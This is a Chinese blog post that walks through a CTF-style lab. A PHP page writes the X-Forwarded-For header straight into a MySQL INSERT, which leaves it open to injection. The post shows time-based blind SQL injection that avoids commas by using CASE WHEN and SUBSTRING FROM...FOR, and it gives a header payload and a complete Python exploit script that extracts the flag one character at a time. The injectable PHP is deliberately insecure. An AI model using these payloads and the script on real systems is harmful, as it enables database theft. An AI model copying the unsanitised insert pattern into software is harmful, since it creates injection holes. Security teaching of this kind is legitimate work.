MySQL延时盲注：绕过逗号

原创

小龙在山东 2022-07-09 00:00:29 博主文章分类：安全实践 ©著作权

文章标签 盲注 mysql sql html 文章分类 PHP 后端开发

©著作权归作者所有：来自51CTO博客作者小龙在山东的原创作品，请联系作者获取转载授权，否则将追究法律责任

代码

php

<?php
error_reporting (0);
 
function getIp(){
     $ip = '' ;
if (isset( $_SERVER ['HTTP_X_FORWARDED_FOR'])){
       $ip = $_SERVER ['HTTP_X_FORWARDED_FOR'];
} else {
      $ip = $_SERVER ['REMOTE_ADDR'];
}
    $ip_arr = explode (',', $ip );
    return $ip_arr [0];
}
 
$host = "localhost" ;
$user = "root" ;
$pass = "root" ;
$db = "ctf1" ;
 
$connect = mysql_connect($host , $user , $pass) or die ("Unable to connect");
 
mysql_select_db( $db ) or die ("Unable to select database");
 
$ip = getIp();
echo 'your ip is :' . $ip ;
$sql = "insert into client_ip (ip) values ('$ip')" ;
mysql_query($sql);  
?>

mysql

CREATE TABLE `client_ip` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(200) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8, AUTO_INCREMENT=1
CREATE TABLE `flag` (
  `flag` varchar(32) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `flag` (`flag`) VALUES
('327a6c4304ad5938eaf0efb6cc3e53dc');

存在延时盲注

GET /sql_sleep_union/ HTTP/1.1
Host: test
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
x-forwarded-for: 10.20.0.12 '+sleep(5) and '1'='1
Connection: close

MySQL延时盲注：绕过逗号_html

类似这样：

mysql> select 1+sleep(5);
+------------+
| 1+sleep(5) |
+------------+
|          1 |
+------------+
1 row in set (5.00 sec)

MySQL延时盲注：绕过逗号_mysql_02

不能用逗号，所以用if函数了，但是可以使用case when 条件 then 代码1 else 代码2 end来判断是否时间等待。

绕过逗号，获取数据

这里用到了substring，可以从前往后遍历，也可以从后往前遍历，两种方法：

mysql> select substring("123" from 1 for 1);
+-------------------------------+
| substring("123" from 1 for 1) |
+-------------------------------+
| 1                             |
+-------------------------------+
1 row in set (0.00 sec)

mysql> select substring("123" from 1 for 2);
+-------------------------------+
| substring("123" from 1 for 2) |
+-------------------------------+
| 12                            |
+-------------------------------+
1 row in set (0.00 sec)

mysql> select substring("123" from -1);
+--------------------------+
| substring("123" from -1) |
+--------------------------+
| 3                        |
+--------------------------+
1 row in set (0.00 sec)

mysql> select substring("123" from -2);
+--------------------------+
| substring("123" from -2) |
+--------------------------+
| 23                       |
+--------------------------+
1 row in set (0.00 sec)
mysql> select substring((select flag from flag limit 1) from 1 for 1);
+---------------------------------------------------------+
| substring((select flag from flag limit 1) from 1 for 1) |
+---------------------------------------------------------+
| 3                                                       |
+---------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select substring((select flag from flag limit 1) from 1 for 2);
+---------------------------------------------------------+
| substring((select flag from flag limit 1) from 1 for 2) |
+---------------------------------------------------------+
| 32                                                      |
+---------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select substring((select flag from flag limit 1) from -1);
+----------------------------------------------------+
| substring((select flag from flag limit 1) from -1) |
+----------------------------------------------------+
| c                                                  |
+----------------------------------------------------+
1 row in set (0.00 sec)

mysql> select substring((select flag from flag limit 1) from -2);
+----------------------------------------------------+
| substring((select flag from flag limit 1) from -2) |
+----------------------------------------------------+
| dc                                                 |
+----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 3;
+----------------------------------------------------------------------+
| (select substring((select flag from flag limit 1) from 1 for 1)) = 3 |
+----------------------------------------------------------------------+
|                                                                    1 |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 4;
+----------------------------------------------------------------------+
| (select substring((select flag from flag limit 1) from 1 for 1)) = 4 |
+----------------------------------------------------------------------+
|                                                                    0 |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 3 as r;
+------+
| r    |
+------+
|    1 |
+------+
1 row in set (0.00 sec)

mysql> select (select substring((select flag from flag limit 1) from 1 for 1)) = 4 as r;
+------+
| r    |
+------+
|    0 |
+------+
1 row in set (0.00 sec)
mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 4 then 1 else 0 end as s;
+---+
| s |
+---+
| 0 |
+---+
1 row in set (0.00 sec)

mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 3 then 1 else 0 end as s;
+---+
| s |
+---+
| 1 |
+---+
1 row in set (0.00 sec)
mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 3 then sleep(5) else 0 end as s;
+---+
| s |
+---+
| 0 |
+---+
1 row in set (5.00 sec)

mysql> select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 4 then sleep(5) else 0 end as s;
+---+
| s |
+---+
| 0 |
+---+
1 row in set (0.00 sec)

payload

x-forwarded-for: 10.20.0.12 '+(select case when (select substring((select flag from flag limit 1) from 1 for 1)) = 3 then sleep(5) else 0 end) and '1'='1

EXP

import requests
maystr = "0987654321qwertyuiopasdfghjklzxcvbnm"
url = "http://test/sql_sleep_union/"
flag = ""
for i in range (32):
    for str in maystr:
        headers = { "x-forwarded-for" : "127.0.0.1'+" + "(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(6) else sleep(0) end ) and '1'='1" % (i + 1 , str )}
        try :
            res = requests.get(url,headers = headers,timeout = 4 )
        except requests.exceptions.ReadTimeout as e:
            flag = flag + str
            print("flag:", flag)
            break
        except KeyboardInterrupt as e:
            exit(0)
        else :
            pass